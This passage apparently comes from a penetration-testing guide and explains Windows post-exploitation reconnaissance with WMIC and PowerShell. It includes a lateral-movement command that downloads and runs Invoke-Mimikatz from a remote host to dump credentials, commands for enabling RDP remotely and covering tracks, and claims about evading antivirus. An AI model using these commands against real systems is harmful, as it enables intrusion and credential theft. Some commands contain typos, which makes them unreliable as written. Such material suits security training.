On newer systems, attackers and penetration testers take advantage of built-in scripting languages, such as the Windows Management Instrumentation Command Line (WMIC), a command-line and scripting interface that is used to simplify access to Windows Instrumentation. If the compromised system supports WMIC, several commands can be used to gather information. Refer to the following table:
|
Command |
Description |
|
wmic nicconfig get ipaddress,macaddress |
Obtains the IP address and MAC address |
|
wmic computersystem get username |
Verifies the account that was compromised |
|
wmic netlogin get name, lastlogon |
Determines who used this system last and when they last logged on |
|
wmic desktop get screensaversecure, screensavertimeout |
Determines whether the screensavers are password protected and what the timeout is |
|
wmic logon get authenticationpackage |
Determines which logon methods are supported |
|
wmic process get caption, executablepath,commandline |
Identifies system processes |
|
wmic process where name="process_name" call terminate |
Terminates specific processes |
|
wmic os get name, servicepackmajorversion |
Determines the system's operating system |
|
wmic product get name, version |
Identifies installed software |
|
wmic product where name="name' call uninstall /nointeractive |
Uninstalls or removes defined software packages |
|
wmic share get /ALL |
Identifies the shares accessible by the user |
|
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" |
Starts RDP remotely |
|
wmicnteventlog get path, filename,writeable |
Finds all of the system event logs and ensures that they can be modified (these are used when it is time to cover your tracks) |
PowerShell is a scripting language built on .NET Framework that runs from a console, giving the user access to the Windows filesystem and objects such as the registry. It is installed by default on the Windows 7 operating system and higher versions. PowerShell extends the scripting support and automation offered by WMIC by permitting the use of shell integration and interoperability on both local and remote targets.
PowerShell gives testers access to a shell and scripting language on a compromised system. Since it is native to the Windows operating system, its use of commands does not trigger antivirus software. When scripts are run on a remote system, PowerShell does not write to the disk, thus bypassing any antivirus software and whitelisting controls (assuming that the user has permitted the use of PowerShell).
PowerShell supports a number of built-in functions that are referred to as cmdlets. One of the advantages of PowerShell is that cmdlets are aliased to common Unix commands, so entering the ls command will return a typical directory listing, as shown in the following screenshot:
PowerShell is a rich language that's capable of supporting very complex operations; it is recommended that the user spend time becoming familiar with its use. Some of the simpler commands that can be used immediately following a compromise are described in the following table:
|
Command |
Description |
|
Get-Host | Select Version |
Identifies the version of PowerShell that's being used by the victim's system. Some cmdlets are added or invoked in different versions. |
|
Get-Hotfix |
Identifies the installed security patches and system hotfixes. |
|
Get-Acl |
Identifies the group names and usernames. |
|
Get-Process, Get-Service |
Lists the current processes and services. |
|
gwmi win32_useraccount |
Invokes WMI to list the user accounts. |
|
Gwmi_win32_group |
Invokes WMI to list the SIDs, names, and domain groups. |
Penetration testers can use Windows native commands, DLLs, .NET functions, WMI calls, and PowerShell cmdlets together to create PowerShell scripts with the .ps1 extension. One such example of lateral movement using WMIC using credentials is when an attacker runs a process on the remote machine to dump a plaintext password from memory. The command to be utilized is as follows:
wmic /USER:"domainuser" /PASSWORD:"Userpassword" /NODE:192.168.0.119 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.24/Invoke-Mimikatz.ps1'); Invoke-MimiKatz -DumpCreds | Out-File C:\users\public\creds.txt
Reconnaissance should also extend to the local network. Since you are working blind, you will need to create a map of live systems and subnets that the compromised host can communicate with. Start by entering IFCONFIG (Unix-based systems) or IPCONFIG /ALL (Windows systems) in the shell prompt. This will allow an attacker to determine the following:
- Whether DHCP addressing is enabled.
- The local IP address, which will also identify at least one active subnet.
- The gateway IP address and DNS server address. System administrators usually follow a numbering convention across the network, and if an attacker knows one address, such as gateway server 192.168.0.1, they will ping addresses such as 192.168.0.123, 192.168.0.138, and so on to find additional subnets.
- The domain name that's used to leverage Active Directory accounts.
If the attacking system and the target system are using Windows, the net view command can be used to enumerate other Windows systems on the network. Attackers use the netstat -rn command to review the routing table, which may contain static routes to networks or systems of interest.
The local network can be scanned using nmap, which sniffs for ARP broadcasts. In addition, Kali has several tools that can be used for an SNMP endpoint analysis, including nmap, onesixtyone, and snmpcheck.
Deploying a packet sniffer to map traffic will help you identify hostnames, active subnets, and domain names. If DHCP addressing is not enabled, it will also allow attackers to identify any unused, static IP addresses. Kali is preconfigured with Wireshark (a GUI-based packet sniffer), but you can also use tshark in a post-exploitation script or from the command line, as shown in the following screenshot:
